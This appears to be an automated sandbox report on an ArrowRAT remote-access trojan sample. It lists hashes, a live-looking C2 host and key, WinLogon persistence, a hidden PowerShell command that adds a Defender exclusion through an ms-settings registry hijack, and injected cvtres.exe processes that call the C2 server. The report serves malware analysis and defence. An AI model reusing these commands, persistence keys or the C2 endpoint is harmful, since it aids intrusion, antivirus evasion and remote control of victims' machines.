Analysis
-
max time kernel
129s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
29-07-2023 20:43
Behavioral task
behavioral1
Sample
0x0009000000012029-61.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
0x0009000000012029-61.exe
Resource
win10v2004-20230703-en
General
-
Target
0x0009000000012029-61.exe
-
Size
158KB
-
MD5
d7dea9816b882cb53d615a3afdf0c955
-
SHA1
d3bfd91ff74c072028bd747d4f56f17cc55168a5
-
SHA256
96d3ba07a0486f3b25474af2ea79d09ada281de55ebedb75f32ffdd670c107c6
-
SHA512
b0881a34616faa65c5f279f5dd1f9e51a951c982046a46afdb109db71dd34c5148db017faf1141ab5a713846d22df463a576c4c274558f56bf624cc703eb0f35
-
SSDEEP
3072:5bzgH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP/NO8Y:5bzge0ODhTEPgnjuIJzo+PPcfP/A8
Malware Config
Extracted
arrowrat
Client
line-ellis.gl.at.ply.gg:10735
nAChhjAnR
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe" 0x0009000000012029-61.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings\shell\open\command 0x0009000000012029-61.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings 0x0009000000012029-61.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings\shell 0x0009000000012029-61.exe Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" 0x0009000000012029-61.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings\shell\open 0x0009000000012029-61.exe Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute 0x0009000000012029-61.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe 2492 0x0009000000012029-61.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2492 0x0009000000012029-61.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe Token: SeShutdownPrivilege 1212 explorer.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe 1212 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2492 0x0009000000012029-61.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2492 wrote to memory of 1212 2492 0x0009000000012029-61.exe 28 PID 2492 wrote to memory of 1212 2492 0x0009000000012029-61.exe 28 PID 2492 wrote to memory of 1212 2492 0x0009000000012029-61.exe 28 PID 2492 wrote to memory of 1540 2492 0x0009000000012029-61.exe 29 PID 2492 wrote to memory of 1540 2492 0x0009000000012029-61.exe 29 PID 2492 wrote to memory of 1540 2492 0x0009000000012029-61.exe 29 PID 2492 wrote to memory of 1540 2492 0x0009000000012029-61.exe 29 PID 2492 wrote to memory of 1740 2492 0x0009000000012029-61.exe 30 PID 2492 wrote to memory of 1740 2492 0x0009000000012029-61.exe 30 PID 2492 wrote to memory of 1740 2492 0x0009000000012029-61.exe 30 PID 2492 wrote to memory of 1740 2492 0x0009000000012029-61.exe 30 PID 2492 wrote to memory of 2072 2492 0x0009000000012029-61.exe 32 PID 2492 wrote to memory of 2072 2492 0x0009000000012029-61.exe 32 PID 2492 wrote to memory of 2072 2492 0x0009000000012029-61.exe 32 PID 2492 wrote to memory of 2072 2492 0x0009000000012029-61.exe 32 PID 2492 wrote to memory of 756 2492 0x0009000000012029-61.exe 31 PID 2492 wrote to memory of 756 2492 0x0009000000012029-61.exe 31 PID 2492 wrote to memory of 756 2492 0x0009000000012029-61.exe 31 PID 2492 wrote to memory of 756 2492 0x0009000000012029-61.exe 31 PID 2492 wrote to memory of 1892 2492 0x0009000000012029-61.exe 33 PID 2492 wrote to memory of 1892 2492 0x0009000000012029-61.exe 33 PID 2492 wrote to memory of 1892 2492 0x0009000000012029-61.exe 33 PID 2492 wrote to memory of 1892 2492 0x0009000000012029-61.exe 33 PID 2492 wrote to memory of 2392 2492 0x0009000000012029-61.exe 34 PID 2492 wrote to memory of 2392 2492 0x0009000000012029-61.exe 34 PID 2492 wrote to memory of 2392 2492 0x0009000000012029-61.exe 34 PID 2492 wrote to memory of 2392 2492 0x0009000000012029-61.exe 34 PID 2492 wrote to memory of 2920 2492 0x0009000000012029-61.exe 35 PID 2492 wrote to memory of 2920 2492 0x0009000000012029-61.exe 35 PID 2492 wrote to memory of 2920 2492 0x0009000000012029-61.exe 35 PID 2492 wrote to memory of 2920 2492 0x0009000000012029-61.exe 35 PID 2492 wrote to memory of 2144 2492 0x0009000000012029-61.exe 36 PID 2492 wrote to memory of 2144 2492 0x0009000000012029-61.exe 36 PID 2492 wrote to memory of 2144 2492 0x0009000000012029-61.exe 36 PID 2492 wrote to memory of 2144 2492 0x0009000000012029-61.exe 36 PID 2492 wrote to memory of 2828 2492 0x0009000000012029-61.exe 37 PID 2492 wrote to memory of 2828 2492 0x0009000000012029-61.exe 37 PID 2492 wrote to memory of 2828 2492 0x0009000000012029-61.exe 37 PID 2492 wrote to memory of 2828 2492 0x0009000000012029-61.exe 37 PID 2492 wrote to memory of 2412 2492 0x0009000000012029-61.exe 38 PID 2492 wrote to memory of 2412 2492 0x0009000000012029-61.exe 38 PID 2492 wrote to memory of 2412 2492 0x0009000000012029-61.exe 38 PID 2492 wrote to memory of 2412 2492 0x0009000000012029-61.exe 38 PID 1212 wrote to memory of 2868 1212 explorer.exe 39 PID 1212 wrote to memory of 2868 1212 explorer.exe 39 PID 1212 wrote to memory of 2868 1212 explorer.exe 39 PID 2492 wrote to memory of 3044 2492 0x0009000000012029-61.exe 40 PID 2492 wrote to memory of 3044 2492 0x0009000000012029-61.exe 40 PID 2492 wrote to memory of 3044 2492 0x0009000000012029-61.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0x0009000000012029-61.exe"C:\Users\Admin\AppData\Local\Temp\0x0009000000012029-61.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2868
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:1540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:1740
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:756
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:1892
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2392
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2920
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2144
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2828
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR2⤵PID:2412
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:3044
-